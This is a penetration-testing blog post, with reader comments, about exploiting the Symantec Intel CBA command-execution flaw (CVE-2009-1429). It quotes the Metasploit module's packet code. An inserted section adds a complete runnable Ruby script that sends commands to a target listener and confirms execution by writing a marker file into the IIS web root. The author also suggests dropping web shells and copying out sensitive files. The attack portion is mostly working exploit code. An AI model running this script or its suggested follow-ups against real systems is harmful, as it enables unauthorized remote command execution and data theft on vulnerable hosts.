• Penetration testing - [Intel CBA CreateProcess() on Symantec ]

    One of the best ways of getting good results from a PT when you have a huge number of IPs to audit and considerably less time is to
    [+] Run an Nmap scan on all the IPs and see whether a common service is running across them
    [-] Admins who manage DCs usually have the habit of installing extra add-on services on their hosts
    [-] System updates are done properly, but add-on updates are neglected
    [+] So the same third-party services will be installed widely across all the hosts

    Anyway, this common stupid practice was something I noticed, but this find is all about exploiting the Intel CBA CreateProcess() on Symantec, which is CVE-2009-1429 (http://cve.mitre.org/cgi-bin/cvename...=CVE-2009-1429); the Nessus Home feed has a plugin that flags this bug.



    [+] Symantec is a widely used IDS+AV suite in corporate networks
    [+] The Symantec client will be installed on all the systems
    [-] So if one vulnerable target is found, the chances are high that many other vulnerable systems are there too

    Triggering the exploit

    This is actually a command execution bug: when a packet carrying a command string is sent to the listener, the string is handed to the Symantec product's CreateProcess() call and interpreted as a command, so OS commands can be executed remotely in the context of the service that owns the listener.


    MSF has a module for this one in:
    auxiliary/admin/symantec/cba_exec.rb

    Code:
    len  = 2 + datastore['CMD'].length   # one length byte covers command + space + NUL

    data =  [0x00000000].pack('V')       # four zero bytes
    data << len.chr                      # single-byte length field
    data << "\x00"
    data << datastore['CMD'] + " "       # Windows command to be passed, space-terminated
    data << "\x00"

    print_status("Sending command: #{datastore['CMD']}")
    sock.put(data)

    res = sock.get_once                  # any reply at all is treated as success

    if (!res)
        print_error("Did not receive data. Failed?")
    else
        print_status("Got data, execution successful!")
    end

    disconnect
    I loaded MSF with the associated auxiliary module.
    [+] The current PT was done on servers with Symantec Corporate Edition installed, and it was easy to 0wn them all.

    I loaded MSF and chose the right exploit.


    woot woot, the commands I set got executed successfully.

    Well, my scope of work was VA + PT, but as the targets were critical ones I shouldn't by any chance execute anything or change any passwords; obviously a POC of the exploit is needed in the report, so what I did was this.

    [+] When the nmap scan was done it showed that IIS was running with the IIS default page, iisstart.html.


    [+] Now, since the command runs on the server itself and C:\inetpub\wwwroot is served by IIS, we can change, modify, edit or add any files there and confirm the result over plain HTTP.

    [+] Just set the exploit's CMD argument to

    Code:
     echo FB1H2S > c:\\inetpub\\wwwroot\\fb1h2s.html
    But I wanted the default page, so I just modified the iisstart.html page with a security audit banner.
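The whole procedure above, from the packet the module builds to the marker-file proof of concept, as a standalone Ruby script. This is example code added for this page, not the original post's code and not the Metasploit module itself. It assumes the listener host and port are supplied by the caller (the post does not state the port), that IIS serves c:\inetpub\wwwroot on port 80, and every helper name in it is my own. It also shows two things the snippet above does not: the single length byte caps the command at 253 bytes, and a parser for the same layout that pulls the command back out of a captured packet.

```ruby
#!/usr/bin/env ruby
# Added example for this page, not the original post's or Metasploit's code.
# Recreates the CBA packet the module builds, sends one command, and checks the
# post's non-destructive PoC (a marker file in the IIS web root) over HTTP.
# Assumptions: host/port come from the caller (the post gives no port), IIS
# serves c:\inetpub\wwwroot on port 80, and all helper names are made up here.
require 'socket'
require 'net/http'
require 'uri'
require 'timeout'

# The length field is a single byte and covers command + space + NUL,
# so the command itself can be at most 253 bytes.
MAX_CMD_LEN = 255 - 2

# Packet layout, byte for byte as the module builds it:
#   4 zero bytes | 1 length byte (2 + cmd length) | NUL | cmd | space | NUL
def build_cba_packet(cmd)
  cmd = cmd.b
  raise ArgumentError, "command exceeds #{MAX_CMD_LEN} bytes" if cmd.bytesize > MAX_CMD_LEN
  len = 2 + cmd.bytesize
  pkt = [0].pack('V')          # four zero bytes, little-endian
  pkt << [len].pack('C')       # one-byte length field
  pkt << "\x00".b
  pkt << cmd << ' '.b          # command, space-terminated
  pkt << "\x00".b
  pkt
end

# Inverse of build_cba_packet: pull the command out of a captured packet, or
# nil if the bytes do not fit the layout (useful for IDS rules and pcap review).
def parse_cba_packet(pkt)
  pkt = pkt.b
  return nil if pkt.bytesize < 8 || pkt[0, 4] != "\x00\x00\x00\x00".b || pkt[5] != "\x00".b
  len = pkt.getbyte(4)
  body = pkt[6, len]
  return nil if len < 2 || body.nil? || body.bytesize != len || body[-2, 2] != " \x00".b
  body[0, len - 2]
end

# The PoC command the post used: write a marker into the web root instead of
# touching passwords or services. cmd.exe accepts single backslashes here.
def marker_command(token, webroot = 'c:\inetpub\wwwroot', filename = 'fb1h2s.html')
  "echo #{token} > #{webroot}\\#{filename}"
end

# Send one command and return the listener's reply (nil on timeout, EOF or
# connection error). As in the module, a reply only tells us something answered.
def send_cba_command(host, port, cmd, timeout = 5)
  pkt = build_cba_packet(cmd)
  Timeout.timeout(timeout) do
    TCPSocket.open(host, port) do |sock|
      sock.write(pkt)
      begin
        sock.readpartial(1024)
      rescue EOFError
        nil
      end
    end
  end
rescue Timeout::Error, SystemCallError
  nil
end

# Pure verdict on an HTTP response, so the logic can be tested offline.
def body_has_marker?(status, body, token)
  status.to_i == 200 && body.to_s.include?(token)
end

# Fetch the marker page and decide whether the command really ran.
def marker_served?(host, path, token, http_port = 80)
  res = Net::HTTP.get_response(URI::HTTP.build(host: host, port: http_port, path: path))
  body_has_marker?(res.code, res.body, token)
end

# Full PoC: send the echo, then confirm the file is served. The HTTP check is
# the real evidence; a TCP reply alone proves nothing about execution.
def run_poc(host, port, token, filename = 'fb1h2s.html', http_port = 80)
  reply = send_cba_command(host, port, marker_command(token, 'c:\inetpub\wwwroot', filename))
  { replied: !reply.nil?, marker_served: marker_served?(host, "/#{filename}", token, http_port) }
end

if $PROGRAM_NAME == __FILE__ && ARGV.size >= 3
  host, port, token = ARGV
  p run_poc(host, port.to_i, token)
end
```

Run it as `ruby cba_poc.rb <host> <port> <token>`; the hash it prints separates "the listener answered" from "the marker is actually served", which is the distinction that belongs in the report. For a blue-team reviewing a capture, parse_cba_packet applied to the TCP payload recovers the exact command that was sent.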



    [+] Likewise I took the other vulnerable systems.

    [+] But this is not the extent of what could be done: we could drop an ASP (or PHP, where installed) shell in the IIS directory and run it, set arbitrary registry values and execute other malicious scripts, download sensitive files by copying them into the server's HTTP directory, and a lot more, but as my scope of work was over I quit thinking about more wicked stuff.

    Regards
    FB1H2S
    This article was originally published in blog: Penetration testing - [Intel CBA CreateProcess() on Symantec ] started by fb1h2s
    Comments (2)
    1. D4rk357 -
       Awesome one bro. Admin would have had a major heart attack seeing the security audit banner.
    2. acutev6 -
       Nice one buddy.. Good work..!